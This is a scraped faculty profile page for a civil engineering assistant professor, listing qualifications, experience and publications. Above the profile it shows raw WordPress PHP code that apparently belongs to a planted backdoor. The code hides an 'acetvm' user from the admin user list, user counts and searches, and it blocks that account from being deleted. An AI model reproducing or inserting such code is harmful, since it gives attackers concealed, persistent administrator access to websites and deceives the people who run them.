add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'acetvm') { wp_die( __('User acetvm tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; });

SREEKESH KP

Designation : Assistant Professor

Qualification : M.E in Construction Engineering and Management

Email-Id: sreekesh.kp@acetvm.com

Research Interests

  • CONSTRUCTION ENGINEERING & PROJECT MANAGEMENT
  • CONCRETE TECHNOLOGY
  • WATER PURIFICATION TECHNIQUES

Teaching Experience  : 13 Years

Teaching Experience

  1. Assistant Professor in Civil Engineering at ACE college of Engineering, Trivandrum from 14/05/2014 onwards.
  2. Worked as lecturer at SCT College of Engineering & Technology from AUG 2011 – SEP 2012

Industry Experience (In years) : 1.0

Industry Experience : Worked as Junior Engineer at BE BILLIMORIA CONSTRUCTION CO LTD

Sl.No
PUBLICATIONS Date
1.     Sreekesh K P, Radhika P, (2018): Environmental friendly alternative for conventional method of water purification in still water bodies – Phytoremediation and Mycoremediation,International Journal of creative research thoughts, April 2018, ISSN 2320-2882 ,  Vol 6 , issue 2 2018
2.     Sreekesh K.P., Dr. C. Ganapathy Chettiar ,(2014): “Bridge Management System and Automation”, proceedings in ICASME. 2014
3.     Sreekesh K.P, Radhika.P,et.al., (2017): “Environmental friendly alternative for conventional method of purification in still water bodies”, Proceedings in  KETCON technological congress at Amal Jyothi College of Engineering 2017